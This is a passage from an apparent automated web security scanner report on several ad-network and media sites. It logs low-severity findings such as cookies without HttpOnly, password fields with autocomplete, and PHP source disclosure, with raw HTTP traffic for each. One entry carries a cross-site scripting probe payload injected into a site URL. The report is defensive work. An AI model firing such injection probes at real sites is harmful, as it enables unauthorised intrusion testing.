rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C86%2C2%2C%2C%267259%3D14658%2C0%2C1%2C%2C%267249%3D14658%2C0%2C1%2C%2C%266432%3D14740%2C56%2C4%2C%2C%265671%3D14742%2C0%2C1%2C%2C%264212%3D14742%2C0%2C1%2C%2C%267935%3D14742%2C0%2C1%2C%2C%266073%3D14742%2C0%2C1%2C%2C%267727%3D14742%2C0%2C1%2C%2C%265852%3D14742%2C0%2C1%2C%2C%266286%3D14843%2C0%2C1%2C%2C; put_2132=439524AE8C6B634E021F5F7802166020

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:40:56 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266073%3D1%267727%3D1%265852%3D1%266286%3D1%266432%3D1; expires=Wed, 12-Oct-2011 12:40:56 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C86%2C2%2C%2C%267259%3D14658%2C0%2C1%2C%2C%267249%3D14658%2C0%2C1%2C%2C%266432%3D14740%2C120%2C6%2C%2C%265671%3D14742%2C0%2C1%2C%2C%264212%3D14742%2C0%2C1%2C%2C%267935%3D14742%2C0%2C1%2C%2C%266073%3D14742%2C0%2C1%2C%2C%267727%3D14742%2C0%2C1%2C%2C%265852%3D14742%2C0%2C1%2C%2C%266286%3D14843%2C0%2C1%2C%2C; expires=Wed, 12-Oct-2011 12:40:56 GMT; path=/; domain=.pixel.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

5.48. http://rs.gwallet.com/r1/pixel/x420r5075003

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rs.gwallet.com
Path:   /r1/pixel/x420r5075003

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r1/pixel/x420r5075003 HTTP/1.1
Host: rs.gwallet.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=1545
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServer.radiumone.gwallet.com=MTAuMTAxLjIuMTIxIDg4ODg=; ra1_uid=4711648038188259648; ra1_oo=1

Response

HTTP/1.1 200 OK
Content-Length: 134
Server: radiumone/1.2
Cache-control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate
Content-type: text/html; charset=UTF-8
Expires: Tue, 29 Oct 2002 19:50:44 GMT
Pragma: no-cache
P3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-cookie: ra1_uid=4711648038188259648; Expires=Tue, 11-Sep-2012 12:49:30 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_sgm=o5; Expires=Fri, 01-Jan-2010 00:00:00 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_sid=22; Expires=Fri, 01-Jan-2010 00:00:00 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_oo=1; Expires=Mon, 12-Sep-2016 12:49:30 GMT; Path=/; Domain=gwallet.com; Version=1

<html><body><img src="http://d7.zedo.com/img/bh.gif?n=826&g=20&a=1600&s=1&l=1&t=e&e=1" width="1" height="1" border="0" ></body></html>

5.49. http://usadmm.dotomi.com/dmm/servlet/dmm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://usadmm.dotomi.com
Path:   /dmm/servlet/dmm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dmm/servlet/dmm?rurl=http%3A//ads.dotomi.com/ads.php%3Fpid%3D18300%26mtg%3D0%26ms%3D18%26btg%3D1%26mp%3D1%26dres%3Diframe%26rwidth%3D728%26rheight%3D90%26pp%3D0%26cg%3D42%26tz%3D300&pid=18300&dres=iframe&mtg=0&ms=18&btg=1&mp=1&rwidth=728&rheight=90&pp=0&cg=42&tz=300&cturl=http://yads.zedo.com/ads2/c%3Fa=669089%3Bn=826%3Bx=3597%3Bc=826000622%2C826000622%3Bg=172%3Bi=0%3B1=8%3B2=1%3Btg=1552553424%3Bs=403%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=k5xiThcyanucBq9IXvhSGSz5~090311%3Bsn=1545%3Bsc=8%3Bss=2%3Bsi=0%3Bse=1%3Bp%3D8%3Bf%3D688047%3Bh%3D484782%3Bo%3D20%3By%3D305%3Bv%3D1%3Bt%3Dr%3Bl%3D1%3Bk=http://www.dotomi.com/ HTTP/1.1
Host: usadmm.dotomi.com
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DotomiUser=230900890276886667$0$2054424934; DotomiNet=2$Dy0uMjgjDTEtBmddBw97SVUbPXYFdQNHClxiUVFOYnpua1xARWZBXAICW0dLSEFdZWBdf21hUn5RIgFAaVg%3D; DotomiStatus=5

Response

HTTP/1.1 302 Moved Temporarily
Date: Mon, 12 Sep 2011 12:48:27 GMT
X-Name: dmm-s02
Set-Cookie: DotomiNet=2$Dy0uMjgjDTEtBmddBw97SVUbPXYFdQNHClxiUVFOYnpua1xARWZBXAICW0dLSEFdZWBdf21hUn5RIgFAaVg%3D; Domain=.dotomi.com; Expires=Wed, 11-Sep-2013 12:48:27 GMT; Path=/
Set-Cookie: DotomiStatus=5; Domain=.dotomi.com; Expires=Sat, 10-Sep-2016 12:48:27 GMT; Path=/
Location: http://ads.dotomi.com/ads.php?pid=18300&mtg=0&ms=18&btg=1&mp=1&dres=iframe&rwidth=728&rheight=90&pp=0&cg=42&tz=300
Content-Length: 0
Content-Type: text/plain


5.50. http://viamtvuk.112.2o7.net/b/ss/viamtvuk/1/H.22.1/s71862144072074

Summary

Severity:   Information
Confidence:   Certain
Host:   http://viamtvuk.112.2o7.net
Path:   /b/ss/viamtvuk/1/H.22.1/s71862144072074

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/viamtvuk/1/H.22.1/s71862144072074?AQB=1&ndh=1&t=12%2F8%2F2011%2012%3A49%3A5%201%20300&pageName=%2F&g=http%3A%2F%2Fwww.mtv.co.uk%2F&r=http%3A%2F%2Fdrupal.org%2Fcases&ch=homepage&events=event16&c1=%2F&h1=index&c3=homepage&c4=not%20logged-in&c5=non-member&c16=homepage&c33=Monday&c34=5%3A30PM&c41=New&v45=Monday&v46=5%3A30PM&v49=homepage&s=1920x1200&c=16&j=1.6&v=Y&k=N&bw=1155&bh=870&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava(TM)%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: viamtvuk.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_x60bafx7Bzx7Djx21x7Cax7Fncc=[CS]v4|272F18FF05010599-4000010960230D66|4E5E718E[CE]; s_vi_ax60sji=[CS]v4|272FD7BC85162345-400001A0C03A9C55|4E5FAF78[CE]; s_vi_efhcjygdx7Fx7Fn=[CS]v4|273164FE850113DC-40000109C022AF4B|4E62C9FC[CE]; s_vi_bax7Fmox7Emaibxxc=[CS]v4|2731656D85013995-4000010FA019802E|4E62CAD6[CE]; s_vi_hizx7Dx7Bix7Fxxjyx60x60=[CS]v4|2732F4C385012B37-4000010D6023C03D|4E65E986[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|2733218685011339-40000104A014EEDE|4E66430C[CE]; s_vi_fx7Bhjeljfd=[CS]v4|2733218685011339-40000104A014EEE0|4E66430C[CE]; s_vi_atamox7Ecaihem=[CS]v4|273678D105013232-60000102803384B7|4E6CF1A1[CE]; s_vi_fox7Cxxjx7Djeejc=[CS]v4|2736FFD10515974F-6000017620169A35|4E6DFFA1[CE]

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:50:03 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_x7Eaiex7Cx7Ex7Dc=[CS]v4|2736FFFD85149B5F-6000018C40017E3C|4E6DFFB0[CE]; Expires=Sat, 10 Sep 2016 12:50:03 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Sun, 11 Sep 2011 12:50:03 GMT
Last-Modified: Tue, 13 Sep 2011 12:50:03 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4E6DFFFB-36A5-3043A8C4"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www498
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

5.51. http://viamtvuk.112.2o7.net/b/ss/viamtvuk/1/H.22.1/s88215071307387

Summary

Severity:   Information
Confidence:   Certain
Host:   http://viamtvuk.112.2o7.net
Path:   /b/ss/viamtvuk/1/H.22.1/s88215071307387

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/viamtvuk/1/H.22.1/s88215071307387?AQB=1&ndh=1&t=12%2F8%2F2011%2013%3A5%3A19%201%20300&pageName=files4e2a2%2522-alert(document.location)-%25226efac768962%2Ffavicon.ico&g=http%3A%2F%2Fwww.mtv.co.uk%2Ffiles4e2a2%2522-alert(document.location)-%25226efac768962%2Ffavicon.ico&r=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&ch=generic&events=event16&h1=files4e2a2%2522-alert(document.location)-%25226efac768962%2Ffavicon.ico&c3=generic&c4=not%20logged-in&c5=non-member&c16=generic&c33=Monday&c34=7%3A00PM&c41=New&v45=Monday&v46=7%3A00PM&v49=generic&s=1920x1200&c=16&j=1.7&v=Y&k=N&bw=1106&bh=816&p=Mozilla%20Default%20Plug-in%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BGoogle%20Earth%20Plugin%3BJava(TM)%20Platform%20SE%206%20U26%3BJava%20Deployment%20Toolkit%206.0.260.3%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BWPI%20Detector%201.4%3BGoogle%20Updater%3BQuickTime%20Plug-in%207.7%3B&AQE=1 HTTP/1.1
Host: viamtvuk.112.2o7.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/files4e2a2%22-alert(document.location)-%226efac768962/favicon.ico
Cookie: s_vi_rrswx7Cx7Frqx7Cx7Eugctuf=[CS]v4|271C9A0205013AFB-6000010B000D5654|4E393403[CE]; s_vi_x7Cgmlox60glm=[CS]v4|271C9A0205013AFB-6000010B000D5657|4E393403[CE]; s_vi_cdgx7Fsu=[CS]v4|271CCE90851604FB-400001A5E000FC45|4E399D20[CE]; s_vi_lex7Fihxxx7Fx7Cgiq=[CS]v4|2727EC2905010CA8-6000011460164A05|4E4FD852[CE]; s_vi_lex7Fihxxx7Fx7Chxxc=[CS]v4|2727ECDB05010F60-600001068035C75A|4E4FD9B3[CE]; s_vi_kx7Cmx7Cix7Edx7Fx7Fbixx=[CS]v4|2727F38685162CE5-40000183603608D2|4E500D14[CE]; s_vi_jcyonx7Eyjabola=[CS]v4|2727F4A185010391-40000101C018DBF5|4E500D13[CE]; s_vi_dinydefxxelh=[CS]v4|272A27560501363F-40000104C0125943|4E544EA8[CE]; s_vi_hizx7Dx7Bix7Fxxjyx60x60=[CS]v4|2732F7FB8515A3B5-600001750000D6D3|4E65EFF6[CE]; s_vi_x7Fbqsx7Cuex7Eyfubcydi=[CS]v4|273321F405158E8D-6000017680001134|4E6643E7[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|273321F405158E8D-6000017680001136|4E6643E7[CE]; s_vi_iex608x3Bgbx7Dnaxx=[CS]v4|27365326051636CC-400001A380004C94|4E6D4EF3[CE]

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 13:05:02 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_x7Eaiex7Cx7Ex7Dc=[CS]v4|2736FFD8051613AB-600001A280003EFD|4E6DFFB0[CE]; Expires=Sat, 10 Sep 2016 13:05:02 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Sun, 11 Sep 2011 13:05:02 GMT
Last-Modified: Tue, 13 Sep 2011 13:05:02 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4E6E037E-2269-131ACF42"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www434
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

6. Password field with autocomplete enabled
There are 5 instances of this issue:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).


6.1. http://www.digitaldollhouse.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.digitaldollhouse.com
Path:   /

Issue detail

The page contains a form with the following action URL:

The form contains the following password fields with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.digitaldollhouse.com
Proxy-Connection: keep-alive
Referer: http://drupal.org/cases
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 12 Sep 2011 12:50:25 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.5
Last-Modified: Mon, 12 Sep 2011 12:50:05 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315831805"
Content-Length: 20260

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" la
...[SNIP]...
</div>
<form action="/" accept-charset="UTF-8" method="post" id="newhome-register" onsubmit="pageTracker._trackPageview(&#039;/virtual/register&#039;);">
<div>
...[SNIP]...
</label>
<input type="password" name="pass[pass1]" id="edit-pass-pass1" maxlength="128" size="25" class="form-text required password-field" />
</div>
...[SNIP]...
</label>
<input type="password" name="pass[pass2]" id="edit-pass-pass2" maxlength="128" size="25" class="form-text required password-confirm" />
</div>
...[SNIP]...

6.2. http://www.digitaldollhouse.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.digitaldollhouse.com
Path:   /

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.digitaldollhouse.com
Proxy-Connection: keep-alive
Referer: http://drupal.org/cases
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 12 Sep 2011 12:50:25 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.5
Last-Modified: Mon, 12 Sep 2011 12:50:05 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315831805"
Content-Length: 20260

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" la
...[SNIP]...
<div id="login"><form action="/homeone?destination=homeone" accept-charset="UTF-8" method="post" id="newhome-login">
<div>
...[SNIP]...
<div class="form-item" id="newhome-login-pass-wrapper">
<input type="password" name="pass" id="newhome-login-pass" maxlength="60" size="15" class="form-text required" />
</div>
...[SNIP]...

6.3. http://www.fastcompany.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.fastcompany.com
Path:   /

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.fastcompany.com
Proxy-Connection: keep-alive
Referer: http://drupal.org/cases
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:47:50 GMT
Server: VoxCAST
Last-Modified: Mon, 12 Sep 2011 12:47:50 GMT
X-Powered-By: PHP/5.2.14
X-Drupal-Cache: HIT
Cache-Control: max-age=0, s-maxage=1200, store, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 13:08:05 GMT
Etag: "1315831685-1"
Vary: Cookie,Accept-Encoding
X-Served-By: daa-www014
X-Cache: HIT from VoxCAST
Age: 1
Content-Length: 67394
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
...[SNIP]...
<div id="left_forms"><form action="/home?destination=home" accept-charset="UTF-8" method="post" id="profilLoginForm" target="_top">
<div>
...[SNIP]...
<div class="form-item" id="edit-pass-wrapper">
<input type="password" name="pass" id="edit-pass" maxlength="60" size="20" class="form-text required" />
</div>
...[SNIP]...

6.4. http://www.fastcompany.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.fastcompany.com
Path:   /

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.fastcompany.com
Proxy-Connection: keep-alive
Referer: http://drupal.org/cases
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:47:50 GMT
Server: VoxCAST
Last-Modified: Mon, 12 Sep 2011 12:47:50 GMT
X-Powered-By: PHP/5.2.14
X-Drupal-Cache: HIT
Cache-Control: max-age=0, s-maxage=1200, store, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 13:08:05 GMT
Etag: "1315831685-1"
Vary: Cookie,Accept-Encoding
X-Served-By: daa-www014
X-Cache: HIT from VoxCAST
Age: 1
Content-Length: 67394
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
...[SNIP]...
</div><form action="/" accept-charset="UTF-8" method="post" id="profileSignUpForm" target="_top">
<div>
...[SNIP]...
<div class="form-item" id="edit-regPass-wrapper">
<input type="password" name="regPass" id="edit-regPass" maxlength="60" size="15" class="form-text required" />
</div>
...[SNIP]...

6.5. http://www.nowpublic.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.nowpublic.com
Path:   /

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.nowpublic.com
Proxy-Connection: keep-alive
Referer: http://drupal.org/cases
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:18 GMT
Server: PWS/1.7.3.3
X-Px: ht lax-agg-n54.panthercdn.com
ETag: "f79c8d21f3918aedd34f5c0ed9e4fcae"
Cache-Control: max-age=360
Expires: Mon, 12 Sep 2011 12:54:12 GMT
Age: 6
Content-Length: 74898
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Last-Modified: Mon, 12 Sep 2011 12:28:25 GMT
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
<div class="wrapper-body">
<form method="post" action="http://my.nowpublic.com/user/login">
<div id="login-name-wrapper" class="form-item">
...[SNIP]...
</label>
<input type="password" name="pass" id="login-pass" maxlength="128" size="30" class="form-text" />
</div>
...[SNIP]...

7. Source code disclosure

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.digitaldollhouse.com
Path:   /

Issue detail

The application appears to disclose some server-side source code written in PHP.

Issue background

Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.

Issue remediation

Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.

Request

GET / HTTP/1.1
Host: www.digitaldollhouse.com
Proxy-Connection: keep-alive
Referer: http://drupal.org/cases
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 12 Sep 2011 12:50:25 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.5
Last-Modified: Mon, 12 Sep 2011 12:50:05 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315831805"
Content-Length: 20260

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" la
...[SNIP]...
<link rel="stylesheet" type="text/css" href="<?=$path?>/newhome.css" />
...[SNIP]...

8. Referer-dependent response
There are 2 instances of this issue:

Issue description

The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.

Common explanations for Referer-dependent responses include:

Issue remediation

The Referer header is not a robust foundation on which to build any security measures, such as access controls or defences against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.

If the contents of responses are updated based on Referer data, then the same defences against malicious input should be employed here as for any other kind of user-supplied data.



8.1. http://adserving.cpxinteractive.com/st

Summary

Severity:   Information
Confidence:   Firm
Host:   http://adserving.cpxinteractive.com
Path:   /st

Request 1

GET /st?ad_type=pop&ad_size=0x0&section=1620509&banned_pop_types=29&pop_times=1&pop_frequency=86400 HTTP/1.1
Host: adserving.cpxinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Set-Cookie: sess=1; path=/; expires=Tue, 13-Sep-2011 12:48:25 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Mon, 12 Sep 2011 12:48:25 GMT
Content-Length: 430

document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=541&inv_code=1620509&media_subtypes=popunder&pop_freq_times=1&pop_freq_duration=86400&referrer=http://www.nowpublic.com/&redir=http%3A%2F%2Fad.yieldmanager.com%2Fst%3Fanmember%3D541%26anprice%3D%7BPRICEBUCKET%7D%26ad_type%3Dpop%26ad_size%3D0x0%26section%3D1620509%26banned_pop_types%3D29%26pop_times%3D1%26pop_frequency%3D86400"></scr'+'ipt>');

Request 2

GET /st?ad_type=pop&ad_size=0x0&section=1620509&banned_pop_types=29&pop_times=1&pop_frequency=86400 HTTP/1.1
Host: adserving.cpxinteractive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Set-Cookie: sess=1; path=/; expires=Tue, 13-Sep-2011 12:48:46 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Mon, 12 Sep 2011 12:48:46 GMT
Content-Length: 395

